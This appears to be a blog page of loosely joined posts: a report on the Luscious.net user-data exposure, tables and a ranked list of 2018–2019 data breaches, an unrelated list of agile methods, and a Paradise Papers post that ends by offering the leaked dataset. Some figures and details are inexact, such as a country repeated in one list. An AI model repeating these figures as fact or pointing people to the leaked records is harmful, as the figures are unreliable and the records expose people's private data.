Luscious.net – exposed data

Luscious.net loses 1million user details. According to the team at vpnMentor, an exposed database allowed access to Luscious account holders’ personal details. 

The accessible data included usernames, email addresses, activity logs, and location data for all 1.195 million users.

“Our team was able to access this database because it was completely unsecured and unencrypted,” writes the vpnMentor team. 

If Luscious users happened to use email addresses associated with their real names to register accounts, that information — tied to location data — could be more than enough to associate specific Luscious accounts with their owners. Users’ video uploads to the site were also accessible.

The breach was discovered on Aug. 15, and, after being notified by vpnMentor, Luscious fixed the issue on Aug. 19. That doesn’t mean, however, that no harm was done. 

“While the data breach is now closed,” write the researchers, “it’s still possible that other hackers could have accessed it earlier and extracted the same data we viewed.” 

“A greater issue of concern is the fact that many users joined Luscious on official government emails,” notes vpnMentor. “We found examples of this from users in Brazil, Australia, Italy, Malaysia, and Australia.”

The 2015 Ashley Madison hack demonstrated how this type of information is practically designed for blackmail. In that case, a dating site purportedly offering to put married men in touch with women was breached, and its database consisting of usernames and emails fell into the hands of hackers.

Data breaches 2019 are expensive

Organisation have had it easy for some time. Data breaches are increasingly being addressed with penalties backed by GDPR legislation. Some noted fines are:

  • British Airways was fined $328M.
  • Facebook fined $5B for Cambridge Analytica data theft.
  • $99M for Marriott Hotel

In Australia, the OAIC reports that it received 812 privacy complaints in 2018.

EntityRecordsOrganization typeMethod
2019 Bulgarian revenue agency hackover 5,000,000governmenthacked
Canva140,000,000webhacked
Capital One106,000,000financialhacked
Desjardins2,900,000financialinside job
Facebook540,000,000social networkpoor security
Facebook1,500,000social networkaccidentally uploaded
First American Corporation885,000,000financial service companypoor security
Health Sciences Authority (Singapore)808,000healthcarepoor security
Justdial100,000,000local searchunprotected api
Ministry of Health (Singapore)14,200healthcarepoor security/inside job
Quest Diagnostics11,900,000Clinical Laboratorypoor security
StockX6,800,000retailhacked
Truecaller299,055,819Telephone directoryunknown
Woodruff Arts Centerunknownarts grouppoor security
Westpac98,000financialhacked
Australian National University19 years of dataacademichacked

Here are a few links to fines noted.

Biggest Data Security breaches 2018

#10 — Panera

Number of victims: 37 million
Who was targeted: All PaneraBread.com customer accounts
What data was exposed: Names, email and physical addresses, birthdays, and the last four digits of the customers’ credit card numbers
Timeframe: Disclosed April 2018
What happened: Despite being warned by a cybersecurity expert in August 2017 that their website was leaking data, the Panera IT team failed to act until 8 months later when it announced the leak and took the site down for security maintenance.

#9 — Newegg

Number of victims: 50 million
Who was targeted: Newegg online shoppers
What data was exposed: Credit card info
Timeframe: August 14, 2018 – September 18, 2018
What happened: The online retailer was hacked by cybergang Magecart, who injected a credit card skimming code into the Newegg website. Whenever a customer bought something online, that payment info went straight to Magecart’s C&C (command and control server).

#8 — Elasticsearch

Number of victims: 82 million (57M consumers, 26M businesses)
Who was targeted: Users and online businesses across the internet
What data was exposed: From individual users — names, email and physical addresses, phone numbers, IP addresses, employers, and job titles. From businesses — names, company details, zip codes, carrier routes, latitudes/longitudes, census tracts, phone numbers, web addresses, email addresses, employee count, revenue numbers, NAICS codes, SIC codes, and more.
Timeframe: Discovered November 14, 2018
What happened: This is one of those cases we mentioned above where a regular security audit led to a researcher stumbling upon over 80 million records of sensitive, aggregated data. It is unknown how long the databases were sitting unguarded and who, if anyone, has had the opportunity to copy and steal all the data. Cybersecurity experts believe they have tracked down the source of the unguarded databases to a data management company that has since closed its doors, but it is still officially unknown.

#7 —  Facebook

Number of victims: 87 million
Who was targeted: Facebook users
What data was exposed: Profile info, political beliefs, friend networks, private messages
Timeframe: Disclosed September 2018
What happened: This is the notorious Cambridge Analytica scandal where the data-collecting firm illegally harvested users’ info without their permission. The secret operation was politically motivated—namely, to influence the 2016 US presidential campaign. And though the breach occurred a couple years ago, it’s only this year that investigatory conclusions have come out, giving us a clearer picture of what happened.

#6 — MyHeritage

Number of victims: 92 million
Who was targeted: MyHeritage users
What data was exposed: email addresses and hashed passwords
Timeframe: Alerted June 2018
What happened: Cybersecurity researchers alerted the genealogy site in June 2018 that an outside server had been discovered with sensitive MyHeritage info. The company confirmed the info was legitimate and alerted its users that any account holders who signed up earlier than October 26, 2017 were at risk and should change their passwords.

#5 — Quora

Number of victims: 100 million
Who was targeted: Quora users
What data was exposed: Names, email addresses, hashed passwords, profile data, public and non-public actions
Timeframe: Discovered December 3, 2018
What happened: Many questions still surround the details of this breach, but the question-and-answer site reported to its users that a third party had gained unauthorized access to one of their systems, expounding no further.  

#4 — Under Armour

Number of victims: 150 million
Who was targeted: MyFitnessPal users
What data was exposed: User names, email addresses, hashed passwords
Timeframe: Late February 2018
What happened: The company’s food and nutrition app was hacked, opening up the above info to the attackers, but not, thankfully, any payment info, which the company processes through a separate channel.

#3 — Exactis

Number of victims: 340 million (230M consumers, 110M businesses)
Who was targeted: Users and businesses across the internet
What data was exposed: Over 400 categories of detail, such as phone numbers, email and physical addresses, interests, ages, religions, pet ownership, etc.
Timeframe: June 2018
What happened: Data collection firm Exactis somehow had 2 terabytes of data relocated to a public site for all to see. It’s unknown who or how many people accessed the info before it was discovered.

#2 — Starwood

Number of victims: 500 million
Who was targeted: Starwood guests
What data was exposed: Names, email and physical addresses, phone numbers, passport numbers, account info, birth dates, gender, travel info, and accommodation info. Some of the breached info also included hashed credit card info.
Timeframe: Discovered September 10, 2018, but could have stretched as far back as 2014
What happened: Like many of the other official breach statements, the Marriott-owned hotel chain issued a statement that its servers had suffered “unauthorized access,” but recent discoveries from the investigation indicate the breach may have been caused by the Chinese government for political purposes.

#1 — Aadhaar

Number of victims: 1.1 billion
Who was targeted: Indian citizens
What data was exposed: Aadhaar numbers, names, email and physical addresses, phone numbers, and photos
Timeframe: August 2017 – January 2018
What happened: Anonymous sellers over WhatsApp charged Rs 500 and lower for a portal into India’s Unique Identification Authority where the records of virtually every citizen was at the payer’s fingertips.

Agile Thinking

Agile has been around some 15 years now. Organisations have tried to leverage agile thinking. Some have failed. Yet agile thinking remains relevant to the enterprise. Agile thinking itself has evolved beyond a technical audience, and now encompasses the broader business community and leverages a smorgasbord of techniques. These include:

  • Kanban
  • Extreme Programming (XP)
  • Holacracy
  • Scrum
  • Rapid Application Development (RAD)
  • Shu-Ha-Ri / Retrospectives
  • Lean Startup
  • Beyond Budgeting
  • Motivation 3.0
  • Stoos Network
  • Radical Management
  • Management 3.0
  • Cynefin Framework
  • WikiSpeed
  • Social Contracts
  • Agile Chartering
  • Agile Testing
  • NoEstimates
  • Showcases

Agile effectively manages people, processes, resources, project time. It is important for teams to evolve soft skills like:

  • Communication
  • Discipline
  • Social Respect
  • Responsibility

The tools for agile has also evolved. These provide:

  • Agile Metrics
  • Impact Mapping, Story Mapping
  • Feature, Epics, Stories
  • Planning Poker
  • Release Planning

 

We has the Paradise Papers

Obviously, the elites haven’t learnt from the Panama Papers. Setting up these offshore structures take a long time, and to de-construct them take significant effort too. So what are the Paradise Papers?

They are 13.4M records acquired from the law firm and corporate services company called “Appleby”. It involves people and organisations.

Interestingly, Singapore has largely kept itself out of this leak.

Anyway, here’s a copy of the paradise papers dataset.